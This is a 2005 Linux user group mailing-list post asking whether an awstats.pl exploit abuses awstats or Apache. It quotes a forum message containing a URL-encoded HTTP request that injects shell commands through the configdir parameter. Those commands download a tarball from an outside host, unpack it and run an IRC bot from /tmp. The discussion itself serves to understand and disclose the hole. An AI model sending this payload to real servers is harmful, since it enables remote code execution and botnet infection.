[TriLUG] How does this exploit work?

Rick DeNatale rick.denatale at gmail.com
Fri Aug 12 13:40:46 EDT 2005


This appeared on the awstats discussion list.  I'm curious as to where
the security hole lies here.  Is it in awstats or in apache?

If I am decoding this correctly, the exploit feeds a shell command
starting with a pipe character to awstats.pl as the config parameter.
My question is, which software actually interprets this as a shell
command to be executed? I think that it must be apache since awstats
seems to take the parameter as a filename string and looks for a
filename and then open it and parse the contents.


---------- Forwarded message ----------
From: SourceForge.net <noreply at sourceforge.net>
Date: Aug 12, 2005 6:39 AM
Subject: [awstats - Open Discussion] RE: hacking
To: noreply at sourceforge.net



Read and respond to this message at:
https://sourceforge.net/forum/message.php?msg_id=3291408
By: nobody

awstats.pl can be used to drop IRC-Bots using the "configdir" argument.

I just discovered so.
"GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwg
et%20www%2eirc%2dbots%2eorg%2f
x%2etar%2egz%3btar%20xvzf%20x%2etar%2egz%3bcd%20x%3b%2e%2fcrond%3becho%20e_exp%3
b%2500 HTTP/1.1"

______________________________________________________________________
You are receiving this email because you elected to monitor this forum.
To stop monitoring this forum, login to SourceForge.net and visit:
https://sourceforge.net/forum/unmonitor.php?forum_id=43428



More information about the TriLUG mailing list